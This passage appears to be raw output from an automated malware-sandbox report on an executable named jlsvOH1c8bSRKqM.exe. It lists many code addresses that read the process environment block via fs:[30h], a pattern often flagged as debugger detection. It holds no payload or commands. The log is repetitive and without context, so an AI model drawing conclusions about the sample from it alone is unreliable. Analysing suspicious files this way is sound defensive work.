            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184437C mov eax, dword ptr fs:[00000030h]8_2_0184437C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01820283 mov eax, dword ptr fs:[00000030h]8_2_01820283
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01820283 mov eax, dword ptr fs:[00000030h]8_2_01820283
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01820283 mov eax, dword ptr fs:[00000030h]8_2_01820283
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179826B mov eax, dword ptr fs:[00000030h]8_2_0179826B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A4260 mov eax, dword ptr fs:[00000030h]8_2_017A4260
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A4260 mov eax, dword ptr fs:[00000030h]8_2_017A4260
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A4260 mov eax, dword ptr fs:[00000030h]8_2_017A4260
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018362A0 mov eax, dword ptr fs:[00000030h]8_2_018362A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018362A0 mov ecx, dword ptr fs:[00000030h]8_2_018362A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018362A0 mov eax, dword ptr fs:[00000030h]8_2_018362A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018362A0 mov eax, dword ptr fs:[00000030h]8_2_018362A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018362A0 mov eax, dword ptr fs:[00000030h]8_2_018362A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018362A0 mov eax, dword ptr fs:[00000030h]8_2_018362A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A6259 mov eax, dword ptr fs:[00000030h]8_2_017A6259
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179A250 mov eax, dword ptr fs:[00000030h]8_2_0179A250
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179823B mov eax, dword ptr fs:[00000030h]8_2_0179823B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018762D6 mov eax, dword ptr fs:[00000030h]8_2_018762D6
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B02E1 mov eax, dword ptr fs:[00000030h]8_2_017B02E1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B02E1 mov eax, dword ptr fs:[00000030h]8_2_017B02E1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B02E1 mov eax, dword ptr fs:[00000030h]8_2_017B02E1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA2C3 mov eax, dword ptr fs:[00000030h]8_2_017AA2C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA2C3 mov eax, dword ptr fs:[00000030h]8_2_017AA2C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA2C3 mov eax, dword ptr fs:[00000030h]8_2_017AA2C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA2C3 mov eax, dword ptr fs:[00000030h]8_2_017AA2C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AA2C3 mov eax, dword ptr fs:[00000030h]8_2_017AA2C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01828243 mov eax, dword ptr fs:[00000030h]8_2_01828243
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01828243 mov ecx, dword ptr fs:[00000030h]8_2_01828243
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185A250 mov eax, dword ptr fs:[00000030h]8_2_0185A250
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185A250 mov eax, dword ptr fs:[00000030h]8_2_0185A250
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0187625D mov eax, dword ptr fs:[00000030h]8_2_0187625D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B02A0 mov eax, dword ptr fs:[00000030h]8_2_017B02A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B02A0 mov eax, dword ptr fs:[00000030h]8_2_017B02A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01850274 mov eax, dword ptr fs:[00000030h]8_2_01850274
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE284 mov eax, dword ptr fs:[00000030h]8_2_017DE284
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE284 mov eax, dword ptr fs:[00000030h]8_2_017DE284
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D656A mov eax, dword ptr fs:[00000030h]8_2_017D656A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D656A mov eax, dword ptr fs:[00000030h]8_2_017D656A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D656A mov eax, dword ptr fs:[00000030h]8_2_017D656A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018205A7 mov eax, dword ptr fs:[00000030h]8_2_018205A7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018205A7 mov eax, dword ptr fs:[00000030h]8_2_018205A7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018205A7 mov eax, dword ptr fs:[00000030h]8_2_018205A7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A8550 mov eax, dword ptr fs:[00000030h]8_2_017A8550
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A8550 mov eax, dword ptr fs:[00000030h]8_2_017A8550
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE53E mov eax, dword ptr fs:[00000030h]8_2_017CE53E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE53E mov eax, dword ptr fs:[00000030h]8_2_017CE53E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE53E mov eax, dword ptr fs:[00000030h]8_2_017CE53E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE53E mov eax, dword ptr fs:[00000030h]8_2_017CE53E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE53E mov eax, dword ptr fs:[00000030h]8_2_017CE53E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 mov eax, dword ptr fs:[00000030h]8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 mov eax, dword ptr fs:[00000030h]8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 mov eax, dword ptr fs:[00000030h]8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 mov eax, dword ptr fs:[00000030h]8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 mov eax, dword ptr fs:[00000030h]8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0535 mov eax, dword ptr fs:[00000030h]8_2_017B0535
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01836500 mov eax, dword ptr fs:[00000030h]8_2_01836500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01874500 mov eax, dword ptr fs:[00000030h]8_2_01874500
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DC5ED mov eax, dword ptr fs:[00000030h]8_2_017DC5ED
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DC5ED mov eax, dword ptr fs:[00000030h]8_2_017DC5ED
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A25E0 mov eax, dword ptr fs:[00000030h]8_2_017A25E0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CE5E7 mov eax, dword ptr fs:[00000030h]8_2_017CE5E7
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A65D0 mov eax, dword ptr fs:[00000030h]8_2_017A65D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DA5D0 mov eax, dword ptr fs:[00000030h]8_2_017DA5D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DA5D0 mov eax, dword ptr fs:[00000030h]8_2_017DA5D0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE5CF mov eax, dword ptr fs:[00000030h]8_2_017DE5CF
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE5CF mov eax, dword ptr fs:[00000030h]8_2_017DE5CF
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C45B1 mov eax, dword ptr fs:[00000030h]8_2_017C45B1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C45B1 mov eax, dword ptr fs:[00000030h]8_2_017C45B1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE59C mov eax, dword ptr fs:[00000030h]8_2_017DE59C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D4588 mov eax, dword ptr fs:[00000030h]8_2_017D4588
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A2582 mov eax, dword ptr fs:[00000030h]8_2_017A2582
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A2582 mov ecx, dword ptr fs:[00000030h]8_2_017A2582
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CA470 mov eax, dword ptr fs:[00000030h]8_2_017CA470
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CA470 mov eax, dword ptr fs:[00000030h]8_2_017CA470
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017CA470 mov eax, dword ptr fs:[00000030h]8_2_017CA470
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185A49A mov eax, dword ptr fs:[00000030h]8_2_0185A49A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179645D mov eax, dword ptr fs:[00000030h]8_2_0179645D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C245A mov eax, dword ptr fs:[00000030h]8_2_017C245A
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182A4B0 mov eax, dword ptr fs:[00000030h]8_2_0182A4B0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DE443 mov eax, dword ptr fs:[00000030h]8_2_017DE443
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179E420 mov eax, dword ptr fs:[00000030h]8_2_0179E420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179E420 mov eax, dword ptr fs:[00000030h]8_2_0179E420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179E420 mov eax, dword ptr fs:[00000030h]8_2_0179E420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0179C427 mov eax, dword ptr fs:[00000030h]8_2_0179C427
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D8402 mov eax, dword ptr fs:[00000030h]8_2_017D8402
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D8402 mov eax, dword ptr fs:[00000030h]8_2_017D8402
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D8402 mov eax, dword ptr fs:[00000030h]8_2_017D8402
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A04E5 mov ecx, dword ptr fs:[00000030h]8_2_017A04E5
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01826420 mov eax, dword ptr fs:[00000030h]8_2_01826420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01826420 mov eax, dword ptr fs:[00000030h]8_2_01826420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01826420 mov eax, dword ptr fs:[00000030h]8_2_01826420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01826420 mov eax, dword ptr fs:[00000030h]8_2_01826420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01826420 mov eax, dword ptr fs:[00000030h]8_2_01826420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01826420 mov eax, dword ptr fs:[00000030h]8_2_01826420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01826420 mov eax, dword ptr fs:[00000030h]8_2_01826420
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D44B0 mov ecx, dword ptr fs:[00000030h]8_2_017D44B0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A64AB mov eax, dword ptr fs:[00000030h]8_2_017A64AB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0185A456 mov eax, dword ptr fs:[00000030h]8_2_0185A456
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182C460 mov ecx, dword ptr fs:[00000030h]8_2_0182C460
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A8770 mov eax, dword ptr fs:[00000030h]8_2_017A8770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0184678E mov eax, dword ptr fs:[00000030h]8_2_0184678E
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 mov eax, dword ptr fs:[00000030h]8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 mov eax, dword ptr fs:[00000030h]8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 mov eax, dword ptr fs:[00000030h]8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 mov eax, dword ptr fs:[00000030h]8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 mov eax, dword ptr fs:[00000030h]8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 mov eax, dword ptr fs:[00000030h]8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 mov eax, dword ptr fs:[00000030h]8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 mov eax, dword ptr fs:[00000030h]8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 mov eax, dword ptr fs:[00000030h]8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 mov eax, dword ptr fs:[00000030h]8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 mov eax, dword ptr fs:[00000030h]8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B0770 mov eax, dword ptr fs:[00000030h]8_2_017B0770
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018547A0 mov eax, dword ptr fs:[00000030h]8_2_018547A0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A0750 mov eax, dword ptr fs:[00000030h]8_2_017A0750
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2750 mov eax, dword ptr fs:[00000030h]8_2_017E2750
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2750 mov eax, dword ptr fs:[00000030h]8_2_017E2750
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D674D mov esi, dword ptr fs:[00000030h]8_2_017D674D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D674D mov eax, dword ptr fs:[00000030h]8_2_017D674D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D674D mov eax, dword ptr fs:[00000030h]8_2_017D674D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D273C mov eax, dword ptr fs:[00000030h]8_2_017D273C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D273C mov ecx, dword ptr fs:[00000030h]8_2_017D273C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D273C mov eax, dword ptr fs:[00000030h]8_2_017D273C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018207C3 mov eax, dword ptr fs:[00000030h]8_2_018207C3
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DC720 mov eax, dword ptr fs:[00000030h]8_2_017DC720
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DC720 mov eax, dword ptr fs:[00000030h]8_2_017DC720
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182E7E1 mov eax, dword ptr fs:[00000030h]8_2_0182E7E1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A0710 mov eax, dword ptr fs:[00000030h]8_2_017A0710
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D0710 mov eax, dword ptr fs:[00000030h]8_2_017D0710
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DC700 mov eax, dword ptr fs:[00000030h]8_2_017DC700
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A47FB mov eax, dword ptr fs:[00000030h]8_2_017A47FB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A47FB mov eax, dword ptr fs:[00000030h]8_2_017A47FB
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C27ED mov eax, dword ptr fs:[00000030h]8_2_017C27ED
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C27ED mov eax, dword ptr fs:[00000030h]8_2_017C27ED
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017C27ED mov eax, dword ptr fs:[00000030h]8_2_017C27ED
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181C730 mov eax, dword ptr fs:[00000030h]8_2_0181C730
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017AC7C0 mov eax, dword ptr fs:[00000030h]8_2_017AC7C0
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A07AF mov eax, dword ptr fs:[00000030h]8_2_017A07AF
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_01824755 mov eax, dword ptr fs:[00000030h]8_2_01824755
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0182E75D mov eax, dword ptr fs:[00000030h]8_2_0182E75D
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D2674 mov eax, dword ptr fs:[00000030h]8_2_017D2674
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DA660 mov eax, dword ptr fs:[00000030h]8_2_017DA660
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017DA660 mov eax, dword ptr fs:[00000030h]8_2_017DA660
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BC640 mov eax, dword ptr fs:[00000030h]8_2_017BC640
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017A262C mov eax, dword ptr fs:[00000030h]8_2_017A262C
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017BE627 mov eax, dword ptr fs:[00000030h]8_2_017BE627
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D6620 mov eax, dword ptr fs:[00000030h]8_2_017D6620
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017D8620 mov eax, dword ptr fs:[00000030h]8_2_017D8620
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017E2619 mov eax, dword ptr fs:[00000030h]8_2_017E2619
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B260B mov eax, dword ptr fs:[00000030h]8_2_017B260B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B260B mov eax, dword ptr fs:[00000030h]8_2_017B260B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B260B mov eax, dword ptr fs:[00000030h]8_2_017B260B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B260B mov eax, dword ptr fs:[00000030h]8_2_017B260B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B260B mov eax, dword ptr fs:[00000030h]8_2_017B260B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B260B mov eax, dword ptr fs:[00000030h]8_2_017B260B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_017B260B mov eax, dword ptr fs:[00000030h]8_2_017B260B
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181E6F2 mov eax, dword ptr fs:[00000030h]8_2_0181E6F2
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181E6F2 mov eax, dword ptr fs:[00000030h]8_2_0181E6F2
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181E6F2 mov eax, dword ptr fs:[00000030h]8_2_0181E6F2
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181E6F2 mov eax, dword ptr fs:[00000030h]8_2_0181E6F2
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018206F1 mov eax, dword ptr fs:[00000030h]8_2_018206F1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_018206F1 mov eax, dword ptr fs:[00000030h]8_2_018206F1
            Source: C:\Users\user\Desktop\jlsvOH1c8bSRKqM.exeCode function: 8_2_0181E609 mov eax, dword ptr fs:[00000030h]8_2_0181E609
